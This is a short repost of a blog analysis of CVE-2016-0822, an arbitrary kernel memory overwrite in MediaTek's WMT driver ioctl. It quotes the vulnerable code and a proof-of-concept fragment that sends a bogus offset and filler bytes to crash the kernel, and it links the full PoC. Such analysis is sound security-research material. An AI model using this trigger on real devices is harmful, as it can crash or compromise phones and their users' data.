zoukankan      html  css  js  c++  java
  • CVE-2016-0822-MTK-drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158

    • CVE-2016-0822-MTK-drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158
    //mediatek/kernel/drivers/combo/common/core/include/wmt_lib.h
    typedef struct {
            UINT32 dowloadSeq;
            UCHAR addRess[4];
            UCHAR patchName[256];
    }WMT_PATCH_INFO,*P_WMT_PATCH_INFO;
    
    VOID wmt_lib_set_patch_num(unsigned long num)
    {
            P_DEV_WMT pWmtDev = &gDevWmt;
            pWmtDev->patchNum = num;
    }
          
      ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);
      case WMT_IOCTL_SET_PATCH_INFO:{
          ...
          if (copy_from_user(&wMtPatchInfo, (void *)arg, sizeof(WMT_PATCH_INFO))) {
                                    WMT_ERR_FUNC("copy_from_user failed at %d
    ", __LINE__);
                                    iRet = -EFAULT;
                                    break;
                            }
          ...
          dWloadSeq = wMtPatchInfo.dowloadSeq; 
          //arbitrary memory overwrite. user can control dowloadSeq
          osal_memcpy(pPatchInfo + dWloadSeq - 1, &wMtPatchInfo,
                                        sizeof(WMT_PATCH_INFO));
    

    CVE-2016-0822 PoC :

    https://github.com/ScottyBauer/Android_Kernel_CVE_POCs/blob/master/CVE-2016-0822-mtk.c

            /* set some absurd offset, in hopes of causing panic or GPF */
            overflow.dowloadSeq = 0x31337;
            /* set obvious bogus data into data fields.
             * If I had exploitation skills these would contain pointers to userland!
             */
            memset(&overflow.addRess, 'A', 4);
            memset(&overflow.patchName, 'A', 256);
    
            ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);
    
  • 相关阅读:
    什么是内存碎片
    java堆内存模型
    java内存模型
    java垃圾回收过程
    找出给定的一个字符串中最长的不重复子串,不重复子串即一个子串中不出现两个相同的字符
    学习tomcat(八)
    学习Redis(二)
    学习k8s(四)
    学习docker(三)
    学习MySql(一)
  • 原文地址:https://www.cnblogs.com/bittorrent/p/5772688.html
Copyright © 2011-2022 走看看